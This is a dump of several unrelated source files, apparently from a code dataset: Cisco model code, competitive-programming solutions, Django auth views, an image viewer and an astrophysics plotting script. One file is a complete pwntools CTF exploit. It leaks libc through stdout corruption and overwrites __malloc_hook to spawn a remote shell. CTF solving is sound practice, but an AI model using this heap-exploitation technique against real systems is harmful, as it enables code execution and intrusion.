137438953472) prop._addConstant("avgMajor", "avg-severity-major", 1099511627776) prop._addConstant("avgMinor", "avg-severity-minor", 549755813888) prop._addConstant("avgRecovering", "avg-recovering", 34359738368) prop._addConstant("avgWarn", "avg-severity-warning", 274877906944) prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192) prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256) prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512) prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096) prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048) prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128) prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024) prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64) prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2) prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4) prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32) prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16) prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1) prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8) prop._addConstant("maxCrit", "max-severity-critical", 17179869184) prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912) prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824) prop._addConstant("maxMajor", "max-severity-major", 8589934592) prop._addConstant("maxMinor", "max-severity-minor", 4294967296) prop._addConstant("maxRecovering", "max-recovering", 268435456) prop._addConstant("maxWarn", "max-severity-warning", 2147483648) prop._addConstant("minCrit", "min-severity-critical", 134217728) prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304) prop._addConstant("minLow", "min-crossed-low-threshold", 8388608) 
prop._addConstant("minMajor", "min-severity-major", 67108864) prop._addConstant("minMinor", "min-severity-minor", 33554432) prop._addConstant("minRecovering", "min-recovering", 2097152) prop._addConstant("minWarn", "min-severity-warning", 16777216) prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576) prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768) prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536) prop._addConstant("periodicMajor", "periodic-severity-major", 524288) prop._addConstant("periodicMinor", "periodic-severity-minor", 262144) prop._addConstant("periodicRecovering", "periodic-recovering", 16384) prop._addConstant("periodicWarn", "periodic-severity-warning", 131072) prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968) prop._addConstant("rateHigh", "rate-crossed-high-threshold", 1125899906842624) prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248) prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984) prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992) prop._addConstant("rateRecovering", "rate-recovering", 562949953421312) prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496) prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656) prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208) prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416) prop._addConstant("trendMajor", "trend-severity-major", 140737488355328) prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664) prop._addConstant("trendRecovering", "trend-recovering", 4398046511104) prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832) prop._addConstant("unspecified", None, 0) meta.props.add("crcCountThr", prop) prop = PropMeta("str", "crcCountTr", "crcCountTr", 45233, PropCategory.IMPLICIT_TREND) prop.label = "CRC Align Errored Packets 
trend" prop.isOper = True prop.isStats = True meta.props.add("crcCountTr", prop) prop = PropMeta("str", "crcMax", "crcMax", 43585, PropCategory.IMPLICIT_MAX) prop.label = "CRC Align Errors maximum value" prop.isOper = True prop.isStats = True meta.props.add("crcMax", prop) prop = PropMeta("str", "crcMin", "crcMin", 43584, PropCategory.IMPLICIT_MIN) prop.label = "CRC Align Errors minimum value" prop.isOper = True prop.isStats = True meta.props.add("crcMin", prop) prop = PropMeta("str", "crcSpct", "crcSpct", 43587, PropCategory.IMPLICIT_SUSPECT) prop.label = "CRC Align Errors suspect count" prop.isOper = True prop.isStats = True meta.props.add("crcSpct", prop) prop = PropMeta("str", "crcThr", "crcThr", 43588, PropCategory.IMPLICIT_THRESHOLDED) prop.label = "CRC Align Errors thresholded flags" prop.isOper = True prop.isStats = True prop.defaultValue = 0 prop.defaultValueStr = "unspecified" prop._addConstant("avgCrit", "avg-severity-critical", 2199023255552) prop._addConstant("avgHigh", "avg-crossed-high-threshold", 68719476736) prop._addConstant("avgLow", "avg-crossed-low-threshold", 137438953472) prop._addConstant("avgMajor", "avg-severity-major", 1099511627776) prop._addConstant("avgMinor", "avg-severity-minor", 549755813888) prop._addConstant("avgRecovering", "avg-recovering", 34359738368) prop._addConstant("avgWarn", "avg-severity-warning", 274877906944) prop._addConstant("cumulativeCrit", "cumulative-severity-critical", 8192) prop._addConstant("cumulativeHigh", "cumulative-crossed-high-threshold", 256) prop._addConstant("cumulativeLow", "cumulative-crossed-low-threshold", 512) prop._addConstant("cumulativeMajor", "cumulative-severity-major", 4096) prop._addConstant("cumulativeMinor", "cumulative-severity-minor", 2048) prop._addConstant("cumulativeRecovering", "cumulative-recovering", 128) prop._addConstant("cumulativeWarn", "cumulative-severity-warning", 1024) prop._addConstant("lastReadingCrit", "lastreading-severity-critical", 64) 
prop._addConstant("lastReadingHigh", "lastreading-crossed-high-threshold", 2) prop._addConstant("lastReadingLow", "lastreading-crossed-low-threshold", 4) prop._addConstant("lastReadingMajor", "lastreading-severity-major", 32) prop._addConstant("lastReadingMinor", "lastreading-severity-minor", 16) prop._addConstant("lastReadingRecovering", "lastreading-recovering", 1) prop._addConstant("lastReadingWarn", "lastreading-severity-warning", 8) prop._addConstant("maxCrit", "max-severity-critical", 17179869184) prop._addConstant("maxHigh", "max-crossed-high-threshold", 536870912) prop._addConstant("maxLow", "max-crossed-low-threshold", 1073741824) prop._addConstant("maxMajor", "max-severity-major", 8589934592) prop._addConstant("maxMinor", "max-severity-minor", 4294967296) prop._addConstant("maxRecovering", "max-recovering", 268435456) prop._addConstant("maxWarn", "max-severity-warning", 2147483648) prop._addConstant("minCrit", "min-severity-critical", 134217728) prop._addConstant("minHigh", "min-crossed-high-threshold", 4194304) prop._addConstant("minLow", "min-crossed-low-threshold", 8388608) prop._addConstant("minMajor", "min-severity-major", 67108864) prop._addConstant("minMinor", "min-severity-minor", 33554432) prop._addConstant("minRecovering", "min-recovering", 2097152) prop._addConstant("minWarn", "min-severity-warning", 16777216) prop._addConstant("periodicCrit", "periodic-severity-critical", 1048576) prop._addConstant("periodicHigh", "periodic-crossed-high-threshold", 32768) prop._addConstant("periodicLow", "periodic-crossed-low-threshold", 65536) prop._addConstant("periodicMajor", "periodic-severity-major", 524288) prop._addConstant("periodicMinor", "periodic-severity-minor", 262144) prop._addConstant("periodicRecovering", "periodic-recovering", 16384) prop._addConstant("periodicWarn", "periodic-severity-warning", 131072) prop._addConstant("rateCrit", "rate-severity-critical", 36028797018963968) prop._addConstant("rateHigh", "rate-crossed-high-threshold", 
1125899906842624) prop._addConstant("rateLow", "rate-crossed-low-threshold", 2251799813685248) prop._addConstant("rateMajor", "rate-severity-major", 18014398509481984) prop._addConstant("rateMinor", "rate-severity-minor", 9007199254740992) prop._addConstant("rateRecovering", "rate-recovering", 562949953421312) prop._addConstant("rateWarn", "rate-severity-warning", 4503599627370496) prop._addConstant("trendCrit", "trend-severity-critical", 281474976710656) prop._addConstant("trendHigh", "trend-crossed-high-threshold", 8796093022208) prop._addConstant("trendLow", "trend-crossed-low-threshold", 17592186044416) prop._addConstant("trendMajor", "trend-severity-major", 140737488355328) prop._addConstant("trendMinor", "trend-severity-minor", 70368744177664) prop._addConstant("trendRecovering", "trend-recovering", 4398046511104) prop._addConstant("trendWarn", "trend-severity-warning", 35184372088832) prop._addConstant("unspecified", None, 0) meta.props.add("crcThr", prop) prop = PropMeta("str", "crcTr", "crcTr", 43589, PropCategory.IMPLICIT_TREND) prop.label = "CRC Align Errors trend" prop.isOper = True prop.isStats = True meta.props.add("crcTr", prop) prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN) prop.label = "None" prop.isDn = True prop.isImplicit = True prop.isAdmin = True prop.isCreateOnly = True meta.props.add("dn", prop) prop = PropMeta("str", "index", "index", 115, PropCategory.REGULAR) prop.label = "History Index" prop.isImplicit = True prop.isAdmin = True meta.props.add("index", prop) prop = PropMeta("str", "lastCollOffset", "lastCollOffset", 111, PropCategory.REGULAR) prop.label = "Collection Length" prop.isImplicit = True prop.isAdmin = True meta.props.add("lastCollOffset", prop) prop = PropMeta("str", "repIntvEnd", "repIntvEnd", 110, PropCategory.REGULAR) prop.label = "Reporting End Time" prop.isImplicit = True prop.isAdmin = True meta.props.add("repIntvEnd", prop) prop = PropMeta("str", "repIntvStart", "repIntvStart", 109, PropCategory.REGULAR) 
prop.label = "Reporting Start Time" prop.isImplicit = True prop.isAdmin = True meta.props.add("repIntvStart", prop) prop = PropMeta("str", "rn", "rn", 2, PropCategory.RN) prop.label = "None" prop.isRn = True prop.isImplicit = True prop.isAdmin = True prop.isCreateOnly = True meta.props.add("rn", prop) prop = PropMeta("str", "status", "status", 3, PropCategory.STATUS) prop.label = "None" prop.isImplicit = True prop.isAdmin = True prop._addConstant("created", "created", 2) prop._addConstant("deleted", "deleted", 8) prop._addConstant("modified", "modified", 4) meta.props.add("status", prop) def __init__(self, parentMoOrDn, markDirty=True, **creationProps): namingVals = [] Mo.__init__(self, parentMoOrDn, markDirty, *namingVals, **creationProps) # End of package file # ##################################################
[ "rrishike@cisco.com" ]
rrishike@cisco.com
c5c6fbb99ac0691b8a7dfdef534b8d24fd07f978
7b9527f6a66bf544071c07498163883ae33ff9ec
/python/1890.py
abe9b60579196c7c25b4d2637e34034451d9754d
[]
no_license
rhyun9584/BOJ
ec4133718934e59689cdcc0d3284bad9a412dc7a
f4c651da7c4840595175abf201d07151d4ac9402
refs/heads/master
2023-08-31T21:29:07.550395
2023-08-25T16:53:53
2023-08-25T16:53:53
225,122,352
0
0
null
null
null
null
UTF-8
Python
false
false
861
py
# BOJ 1890 "Jump": count the paths from the top-left to the bottom-right
# cell of an N x N board, moving only right or down by exactly the number
# written in the current cell (0 marks a dead end / the goal).
#
# The original recursive DFS with partial memoisation needed an enlarged
# recursion limit and re-walked the `road` stack; a forward dynamic
# programme visits every cell exactly once (O(N^2)) and needs no recursion.
import sys


def count_paths(n, grid):
    """Return the number of right/down jump paths from (0, 0) to (n-1, n-1).

    grid[i][j] is the jump length from cell (i, j); a 0 means the cell is
    never jumped from (which also covers the goal cell).  Counts can exceed
    2**31, which is fine for Python ints.
    """
    # dp[i][j] = number of distinct paths that reach cell (i, j).
    dp = [[0] * n for _ in range(n)]
    dp[0][0] = 1
    for i in range(n):
        for j in range(n):
            d = grid[i][j]
            # Skip cells that are unreachable or dead ends; the goal cell
            # carries d == 0, so it is never propagated from.
            if dp[i][j] == 0 or d == 0:
                continue
            if i + d < n:
                dp[i + d][j] += dp[i][j]
            if j + d < n:
                dp[i][j + d] += dp[i][j]
    return dp[n - 1][n - 1]


def main():
    """Read the board from stdin and print the path count (judge protocol)."""
    read = sys.stdin.readline
    n = int(read())
    grid = [list(map(int, read().split())) for _ in range(n)]
    print(count_paths(n, grid))


if __name__ == "__main__":
    main()
[ "rhyun9584@naver.com" ]
rhyun9584@naver.com
f0273087f58f8b16f942e2277ca294b63150082b
7e40c8bb28c2cee8e023751557b90ef7ef518326
/npuctf_2020_bad_guy/npuctf_2020_bad_guy.py
932efdc96ee2919b873e1565c181f2bb8861c812
[]
no_license
1337536723/buuctf_pwn
b6e5d65372ed0638a722faef1775026a89321fa3
cca3c4151a50c7d7c3237dab2c5a283dbcf6fccf
refs/heads/master
2023-08-29T19:35:04.352530
2021-11-16T14:06:20
2021-11-16T14:06:20
null
0
0
null
null
null
null
UTF-8
Python
false
false
2,190
py
# CTF heap-exploitation script for the BUUCTF challenge "npuctf_2020_bad_guy"
# (glibc 2.23 target).  It drives the remote binary's menu protocol over a
# pwntools tube held in the module-global `p`.
from pwn import *
#context.log_level = 'debug'
context.arch = 'amd64'
#p = remote('node4.buuoj.cn', )
# Offsets below are resolved against this specific libc build.
libc = ELF('libc-2.23.buu.so')

# Thin aliases over the pwntools tube API; all operate on the global `p`.
ru = lambda s : p.recvuntil(s)
sn = lambda s : p.send(s)
sla = lambda r, s : p.sendlineafter(r, s)
sa = lambda r, s : p.sendafter(r, s)
sl = lambda s : p.sendline(s)
rv = lambda s : p.recv(s)

def debug(s):
    # Attach gdb with symbols for the matching debug libc; `s` is appended
    # as extra gdb commands.
    gdb.attach(p, '''
source ~/libc/loadsym.py
loadsym ~/libc/2.23/64/libc-2.23.debug.so
''' + s)

def alloc(index, size, content):
    # Menu option 1: allocate a chunk at `index` of `size` bytes and write
    # `content` into it.
    sla(b'>> ', b'1')
    sla(b'Index :', str(index).encode())
    sla(b'size: ', str(size).encode())
    sa(b'Content:', content)

def edit(index, size, content):
    # Menu option 2: rewrite `size` bytes of chunk `index` — the overflow
    # primitive used throughout exp() (size is caller-controlled).
    sla(b'>> ', b'2')
    sla(b'Index :', str(index).encode())
    sla(b'size: ', str(size).encode())
    sa(b'content:', content)

def delete(index):
    # Menu option 3: free chunk `index`.
    sla(b'>> ', b'3')
    sla(b'Index :', str(index).encode())

def exp():
    # Stage 1: groom the heap, then use edit() on chunk 0 to forge a fake
    # 0x91 size field over the freed neighbour.
    alloc(0, 0x10, b'a')
    alloc(1, 0x10, b'a')
    alloc(2, 0x60, b'a')
    alloc(3, 0x10, b'a')
    delete(2)
    edit(0, 0x20, b'\x00' * 0x10 + p64(0) + p64(0x91))
    delete(1)
    alloc(1, 0x10, b'a')
    # Partial (2-byte) overwrite of a fastbin fd — b'\xdd\x85' steers the
    # next 0x70 fastbin allocation toward _IO_2_1_stdout_ (low 12 bits are
    # ASLR-invariant; the remaining nibble is brute-forced by the retry
    # loop in __main__).
    edit(1, 0x22, b'a' * 0x10 + p64(0) + p64(0x71) + b'\xdd\x85')
    alloc(2, 0x60, b'a')
    # padding flag read_buf write_buf
    # Overwriting stdout's flags with 0xfbad1800 and the buffer pointers
    # makes the next stdout flush leak libc memory back to us.
    layout = [
        '\x00' * 0x33,
        0xfbad1800,
        0, 0, 0,
        b'\x58'
    ]
    alloc(3, 0x60, flat(layout))
    # one_gadget offsets: first list for a local libc, second for the BUU
    # remote libc (the one actually used below).
    one_gadgets = [0x45206, 0x4525a, 0xef9f4, 0xf0897]
    one_gadgets_buu = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
    # The 8 leaked bytes point 131 bytes past _IO_2_1_stdout_; rebase libc.
    libc_base = u64(rv(8)) - libc.sym['_IO_2_1_stdout_'] - 131
    malloc_hook = libc_base + libc.sym['__malloc_hook']
    one = libc_base + one_gadgets_buu[3]
    success('libc_base -> {}'.format(hex(libc_base)))
    #uaf
    # Stage 2: repeat the fastbin poisoning, this time pointing the fd at
    # malloc_hook - 0x23 (a known misaligned 0x7f "size" inside libc).
    alloc(0, 0x60, b'a')
    alloc(0, 0x60, b'a')
    alloc(1, 0x60, b'a')
    alloc(2, 0x60, b'a')
    alloc(3, 0x30, b'a')  #avoid merge
    edit(0, 0x70, b'\x00' * 0x60 + p64(0) + p64(0xe1))
    delete(1)
    alloc(1, 0x60, b'a')
    alloc(3, 0x60, b'a')
    delete(3)
    edit(2, 0x8, p64(malloc_hook - 0x23))
    alloc(0, 0x60, b'a')
    # Write the one_gadget address over __malloc_hook (0x13 bytes of
    # padding reach the hook from the fake chunk's data start).
    alloc(0, 0x60, b'\x00' * 0x13 + p64(one))
    # Trigger malloc() -> __malloc_hook -> one_gadget -> shell.
    sla(b'>> ', b'1')
    sla(b'Index :', b'0')
    sla(b'size: ', b'20')
    p.interactive()

if __name__ == "__main__":
    # Retry until the 4-bit ASLR guess in the partial overwrite lands.
    # NOTE(review): the bare `except:` retries on *any* error, including
    # KeyboardInterrupt — deliberate for brute-forcing, but noisy.
    while True:
        try:
            #p = process('./npuctf_2020_bad_guy')
            p = remote('node4.buuoj.cn', 29604)
            exp()
            break
        except:
            p.close()
[ "admin@srmxy.cn" ]
admin@srmxy.cn
7280ce1423804ba07d711d41cda2d662613bc199
809e1b7ca0d9e265c4f3e49e18e4e3c64e561526
/login/loginreg/views - Copy.py
f0f7cf87a84a6fd07bf8955930eddf73b1b74626
[]
no_license
gitanjali1077/Login
e4a9c6ede5916a2d42440b29fdf424ad6a80a688
5823579b14df68874c8df07a95ec9a796b705207
refs/heads/master
2021-01-22T21:41:33.529308
2017-08-14T15:45:43
2017-08-14T15:45:43
85,465,261
0
0
null
null
null
null
UTF-8
Python
false
false
4,251
py
# Django function-based views for user registration, login and logout.
# NOTE(review): `print user_form1.errors` below is Python 2 statement
# syntax, so this module targets Python 2 / a pre-2.0 Django (it also
# imports the long-removed `django.core.urlresolvers`).
from login.settings import SENDER,PASS
import smtplib
from django.shortcuts import render,render_to_response
from django import forms
from django.views.generic import View
from django.views.generic.edit import FormView
from django.views import generic
#require a form to create a new object
from django.views.generic.edit import CreateView,UpdateView ,DeleteView # for uploading form
from django.core.urlresolvers import reverse_lazy
# for login
from django.shortcuts import render,redirect
from django.contrib.auth import authenticate,login,logout
from django.views.generic import View
from .forms import UserForm ,UserFormlog
from django.template import RequestContext
from django.contrib.auth import views as auth_views
from django.contrib import auth
from django.contrib.auth.decorators import login_required

# Create your views here.
def create_profile(request):
    # GET: render an empty registration form; POST: validate, create the
    # user, send a welcome mail over SMTP, then log the new user in.
    if request.method == 'GET':
        # NOTE(review): passes the form *class*, not an instance — works in
        # templates but is unconventional.
        user_form = UserForm
        return render(request, 'profile.html', {
            'user_form': user_form
        })
    if request.method == 'POST':
        user_form = UserForm(request.POST)
        if user_form.is_valid() :
            user1= user_form.save(commit=False)
            #prof= profile_form.save()
            username = user_form.cleaned_data['username']
            fname = user_form.cleaned_data['first_name']  # NOTE(review): unused
            password = user_form.cleaned_data['password']
            email = user_form.cleaned_data['email']
            # Hash the password properly instead of storing it raw.
            user1.set_password(password)
            user1.save()
            # Welcome mail, sent synchronously over Gmail SMTP.
            # NOTE(review): blocks the request and has no error handling;
            # `msg` also lacks RFC 2822 headers (Subject/From/To).
            msg="Hello , \n Welcome here"
            smtp= smtplib.SMTP('smtp.gmail.com')
            smtp.ehlo()
            smtp.starttls()
            smtp.ehlo()
            smtp.login(SENDER,PASS)
            smtp.sendmail(SENDER,email,msg)
            smtp.quit()
            #profile=profile_form.save(commit=False)
            #profile.user_id=user1.id+1
            #profile.college=profile_form.cleaned_data['college']
            #profile.save()
            # Immediately authenticate and log in the freshly created user.
            user = authenticate(username=username ,password=password)
            if user is not None:
                if user.is_active:
                    login(request, user)
                    return redirect('index.html')
        #return render(request,'index.html'
        #profile_form.save()
        #return redirect('settings:profile')
        # Fall through on invalid form (or inactive user): re-render with errors.
        return render(request, 'register/profile.html', {
            'user_form': user_form
        })

def indexpage(request):
    # Landing page; only handles GET (returns None for other methods).
    if request.method == 'GET':
        user_form = UserForm  # NOTE(review): unused in this view
        return render(request, 'index.html', )

# NOTE(review): `global` at module level is a no-op; user_form1 is simply a
# local inside userlogin below.
global user_form1
#@login_required for stopping user from some pages
def userlogin(request):
    # GET: render the login form; POST: authenticate and start a session.
    ab="pagal hai"
    if request.method == 'GET':
        user_form = UserFormlog
        return render(request, 'login.html', {
            'form': user_form
            #user_form
        })
    if request.method == 'POST':
        user_form1 = UserFormlog(request.POST)
        if user_form1.is_valid() :
            ab="post chala"
            #prof= profile_form.save()
            username = user_form1.cleaned_data['username']
            password = user_form1.cleaned_data['password']
            #profile=profile_form.save(commit=False)
            #profile.user_id=user1.id+1
            #profile.college=profile_form.cleaned_data['college']
            #profile.save()
            user1 = authenticate(username=username ,password=password)
            if user1 :
                auth.login(request, user1)
                #return redirect('index.html')
                return render(request,'index.html',{
                    'user1': user_form1
                })
            else:
                # Bad credentials.
                return redirect('nope.html')
            #profile_form.save()
            #return redirect('settings:profile')
        else:
            # Invalid form: dump errors to the console and re-render.
            print user_form1.errors
            return render(request, 'login.html', {
                'user_form': user_form1 ,'ab':ab
            })

def logout(request):
    # End the session and show the login page with a "logged out" banner.
    # NOTE(review): this function shadows the imported
    # django.contrib.auth.logout; auth.logout() is what actually runs.
    auth.logout(request)
    #user_form1= users.objects.filter(user__username=request.user)
    # NOTE(review): blanking username on the (already logged-out) user
    # object only mutates it in memory — it is never saved; verify intent.
    user_form1=request.user
    user_form1.username=''
    return render_to_response('login.html', {'box_width': '402', 'logged_out': '1',})
    # context_instance=RequestContext(request))
[ "gitanjali1077@gmail.com" ]
gitanjali1077@gmail.com
65804be70908e44da99b1c7b18eab58a05435784
5fff534c0f5b5c1de498a9be7d7cd7f1f86ba5a1
/myvenv/bin/viewer.py
8aaa5b0ed68e599bb3af7c711324c71e7f4f1f55
[]
no_license
baidoosik/portfolio
1287d2e4803608f83e1ba4190d82af76fd29db08
6f4b2c861231fae326d47cbbe9711139ab041d59
refs/heads/master
2021-01-18T03:14:01.288730
2017-06-14T14:59:51
2017-06-14T14:59:51
85,835,651
0
0
null
null
null
null
UTF-8
Python
false
false
998
py
#!/Users/doosikbai/worldnomade/myvenv/bin/python3 # # The Python Imaging Library # $Id$ # from __future__ import print_function try: from tkinter import Tk, Label except ImportError: from Tkinter import Tk, Label from PIL import Image, ImageTk # # an image viewer class UI(Label): def __init__(self, master, im): if im.mode == "1": # bitmap image self.image = ImageTk.BitmapImage(im, foreground="white") Label.__init__(self, master, image=self.image, bg="black", bd=0) else: # photo image self.image = ImageTk.PhotoImage(im) Label.__init__(self, master, image=self.image, bd=0) # # script interface if __name__ == "__main__": import sys if not sys.argv[1:]: print("Syntax: python viewer.py imagefile") sys.exit(1) filename = sys.argv[1] root = Tk() root.title(filename) im = Image.open(filename) UI(root, im).pack() root.mainloop()
[ "qoentlr37@naver.com" ]
qoentlr37@naver.com
7b710a4e7e7137dd09a8b44701b6dd14e45c605a
4fbd844113ec9d8c526d5f186274b40ad5502aa3
/algorithms/python3/arithmetic_slices.py
c77282972d02cdeaf46c52a16d55caf6ef39dc8d
[]
no_license
capric8416/leetcode
51f9bdc3fa26b010e8a1e8203a7e1bcd70ace9e1
503b2e303b10a455be9596c31975ee7973819a3c
refs/heads/master
2022-07-16T21:41:07.492706
2020-04-22T06:18:16
2020-04-22T06:18:16
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,095
py
# !/usr/bin/env python
# -*- coding: utf-8 -*-


"""
A sequence of number is called arithmetic if it consists of at least three elements and
if the difference between any two consecutive elements is the same.

For example, these are arithmetic sequence:

1, 3, 5, 7, 9
7, 7, 7, 7
3, -1, -5, -9

The following sequence is not arithmetic.

1, 1, 2, 5, 7

A zero-indexed array A consisting of N numbers is given. A slice of that array is any pair
of integers (P, Q) such that 0 <= P < Q < N.

A slice (P, Q) of array A is called arithmetic if the sequence:
A[P], A[p + 1], ..., A[Q - 1], A[Q] is arithmetic. In particular, this means that P + 1 < Q.

The function should return the number of arithmetic slices in the array A.


Example:

A = [1, 2, 3, 4]

return: 3, for 3 arithmetic slices in A: [1, 2, 3], [2, 3, 4] and [1, 2, 3, 4] itself.
"""

""" ==================== body ==================== """


class Solution:
    def numberOfArithmeticSlices(self, A):
        """Count arithmetic slices (length >= 3 with constant difference).

        Runs in O(n) time / O(1) space: `run` is the number of arithmetic
        slices *ending* at the current index; when A[i] extends the current
        constant-difference streak, one new slice ends at i for every
        previous length, so `run` grows by 1 and is folded into the total.

        :type A: List[int]
        :rtype: int
        """
        total = 0
        run = 0  # arithmetic slices ending at index i
        for i in range(2, len(A)):
            if A[i] - A[i - 1] == A[i - 1] - A[i - 2]:
                run += 1
                total += run
            else:
                # Streak broken: the next slice must start fresh.
                run = 0
        return total


""" ==================== body ==================== """
[ "capric8416@gmail.com" ]
capric8416@gmail.com
1a28e3779dba8c219f0d15eae95d6f27d2cc046a
99ec9dbc139fda4d2b29509dcf606cf836eacc5f
/Dust-wave/zones-v-n-plane-RSG.py
6625fd7fe00248f28491c893b585b5e894f714c3
[]
no_license
will-henney/bowshock-shape
1f1caa9a6fea2681ce356d5679cafacef2aab9e1
dfdb1f997bf05fa0f8a5b5101aeaa8d4292e012f
refs/heads/master
2022-11-17T09:22:46.334456
2020-07-14T04:29:22
2020-07-14T04:29:22
5,662,223
0
0
null
null
null
null
UTF-8
Python
false
false
4,705
py
# Plot the bow-shock regime zones for an M supergiant in the (velocity,
# density) plane, with contours of the bow radius R0 and of the
# post-shock cooling length, saved as a PDF named after this script.
import sys
import numpy as np
from matplotlib import pyplot as plt
import seaborn as sns
from vec_root import chandrupatla

# Output figure name is derived from the script name (e.g. foo.py -> foo.pdf).
figname = sys.argv[0].replace('.py', '.pdf')

sns.set_style('ticks')
sns.set_color_codes('dark')
fig, axes = plt.subplots(1, 1, sharex=True, sharey=True, figsize=(3.3, 4))

# One row per star: [M, L4, eta, S49, target axes].
# NOTE(review): S49 is unpacked in the loop but never used below.
stardata = [
    [20.0, 15.6, 0.0476, 0.0, axes],
]

# Velocities in units of km/s (10 km/s -> 100 km/s)
vgrid = np.linspace(10.0, 100.0, 800)
# Densities in units of 1 pcc (0.01 -> 1e5)
logngrid = np.linspace(-3.3, 6.3, 800)
# 2d versions of velocity and density grids
vv, nn = np.meshgrid(vgrid, 10**logngrid)


def rstar(v10, n, L4):
    """Characteristic radius in pc"""
    # v10: velocity in units of 10 km/s; n: density; L4: luminosity / 1e4 Lsun.
    return 2.21*np.sqrt(L4/n)/v10


def taustar(v10, n, L4, kappa600=1.0):
    """Characteristic optical depth"""
    # kappa600: dust opacity normalised to 600 (see `kappa` below).
    return 0.0089*kappa600*np.sqrt(L4*n)/v10


def xfunc(x, ts, eta):
    """Function to be zeroed to find x"""
    # Root x gives R0/Rs; ts is tau*, eta the wind/radiation ratio.
    return x**2 - (1.0 - np.exp(-2*ts*x)) - eta


# Contour levels (pc) for the bow radius R0, with line widths growing
# with radius.
R0s = (0.0003, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1.0, 3.0, 10.0, 30.0)
lws = np.linspace(0.3, 2.5, len(R0s))
# Labels for a subset of the contour levels.
# NOTE(review): the 0.0001 key has no matching level in R0s, so it can
# never be labelled — confirm whether intentional.
cformats = {
    0.0001: "0.0001 pc",
    0.001: "0.001 pc",
    0.01: "0.01 pc",
    0.1: "0.1 pc",
    1.0: "1 pc",
    10.0: "10 pc",
}
clevs_to_label = list(cformats.keys())
box_params = dict(fc='w', ec='0.8', lw=0.4, pad=2)
RBW_label = r"Radiation bow wave, $\eta < \tau < 1$"
RBS_label = r"Radiation bow shock, $\tau > 1$"
WBS_label = r"Wind bow shock, $\tau < \eta$"

# Miscellaneous panel-dependent plot params
d = {
    "RBW y": {33.0: 1500.0, 20.0: 1e5, 40.0: 2500.0},
    "trapped y": {33.0: 250, 20.0: 2.5e5, 40.0: 1.5e5},
    "trapped bg": {33.0: 'w', 20.0: 'w', 40.0: 'w'},
    "IF tau": {33.0: 0.2, 20.0: 3.7, 40.0: 6.4},
    "IF tau gas": {33.0: 5.0, 20.0: 5.0, 40.0: 5.0},
}
# Ambient temperature (K) and dust opacity used below.
T0 = 1000
kappa = 60.0
for M, L4, eta, S49, ax in stardata:
    Mlabel = "\n".join([
        "M supergiant",
        "",
        rf"$M = {M:.0f}\, M_\odot$",
        rf"$L = {1e4*L4:.1e}\, L_\odot$".replace("e+0", r"\times 10^"),
        rf"$\eta = {eta}$"])
    # Characteristic radius and optical depth over the whole (v, n) grid.
    Rs = rstar(vv/10, nn, L4)
    ts = taustar(vv/10, nn, L4, kappa600=kappa/600.0)
    # Bracket [a, b] for the root of xfunc, solved vectorially.
    a, b = 0.0, 2*np.sqrt(1.0 + eta)
    x = chandrupatla(xfunc, a, b, args=(ts, eta))
    R0 = x*Rs
    tau = 2*x*ts
    # Shade the radiation-bow-wave band eta < tau < 1.
    ax.contourf(vv, nn, tau, (eta, 1.0), colors='k', alpha=0.15)
    # ax.contour(vv, nn, tau, (eta/3, eta, 3*eta), colors='r')
    # ax.contour(vv, nn, tau, (1.0, 3.0), colors='m')
    # Contours of constant bow radius, labelled at selected levels.
    cs = ax.contour(vv, nn, R0, R0s, linewidths=lws, colors='k')
    clevs = [level for level in clevs_to_label if level in cs.levels]
    ax.clabel(cs, clevs,
              fontsize='x-small', fmt=cformats,
              inline=True, inline_spacing=2, use_clabeltext=True)
    ax.text(62.0, 1e-2, Mlabel, zorder=100,
            fontsize='x-small', bbox=box_params)
    ax.text(18.0, d["RBW y"][M], RBW_label, rotation=15,
            fontsize='xx-small', bbox={**box_params, **dict(fc='0.85', ec='0.6')})
    ax.text(16.0, 2e6, RBS_label, rotation=15,
            fontsize='xx-small', bbox=box_params)
    ax.text(20.0, 300.0, WBS_label, rotation=15,
            fontsize='xx-small', bbox=box_params)

    #
    # Now do the cooling length
    #

    # Sound speed:
    # NOTE(review): `cs` here shadows the contour-set variable above (and
    # is shadowed again below) — works, but confusing.
    cs = 11.4*np.sqrt(T0/1e4)
    # pre-shock Mach number
    M0 = vv/cs
    # post-shock Mach number
    M1 = np.sqrt((M0**2 + 3)/(5*M0**2 - 1))
    # post-shock temperature in units of T0
    T1 = (5*M0**2 - 1)*(1 + 3/M0**2) / 16
    # post-shock density
    n1 = nn*4*M0**2 / (M0**2 + 3)
    # post-shock velocity
    v1 = vv*nn/n1
    # Cooling rate
    Lam1 = 3.3e-24 * (T1*T0/1e4)**2.3
    Lam2 = 1e-20 / (T1*T0/1e4)
    k = 3
    # Smooth minimum of the two cooling branches (harmonic-type blend).
    Lambda = (Lam1**(-k) + Lam2**(-k))**(-1/k)
